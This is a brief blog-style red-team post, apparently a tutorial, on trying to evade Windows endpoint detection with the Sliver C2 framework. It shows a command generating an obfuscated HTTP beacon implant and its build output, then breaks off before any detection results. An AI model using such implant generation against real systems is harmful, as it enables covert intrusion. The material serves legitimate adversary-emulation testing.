Breaking into Windows: Attempting to bypass EDR with Sliver
Sliver C2 is a pretty awesome alternative to metasploit developed by Bishop Fox:
Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS and are dynamically compiled with per-binary asymmetric encryption keys.
You can create both a beacon and an implant. Im going to be using a beacon as it is alot stelthier:
$ sliver > generate beacon --http --os windows --arch amd64 --format exe
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /home/cleck/MODERN_MIDWIFE.exe
If we throw this into virus total we get: